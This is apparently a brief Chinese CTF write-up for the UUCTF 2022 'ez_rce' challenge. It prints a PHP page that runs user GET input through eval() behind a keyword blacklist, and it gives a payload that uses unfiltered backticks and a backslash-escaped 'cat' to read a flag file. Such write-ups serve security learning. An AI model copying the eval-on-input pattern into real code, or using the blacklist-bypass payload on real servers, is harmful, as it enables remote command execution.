ez_rce
<?php ## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢???????????? if(isset($_GET['code'])){ $code=$_GET['code']; if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){ echo '看看你输入的参数!!!不叫样子!!';echo '<br>'; eval($code); } else{ die("你想干什么?????????"); } } else{ echo "居然都不输入参数,可恶!!!!!!!!!"; show_source(__FILE__); }
首先看源码,发现过滤了许多参数,但是没有过滤``;
所以我们可以使用``来命令执行;
payload:?code=printf(`c\at /fffffffffflagafag`);
标签:__,code,UUCTF,新生,else,过滤,2022 From: https://www.cnblogs.com/kode00/p/17380389.html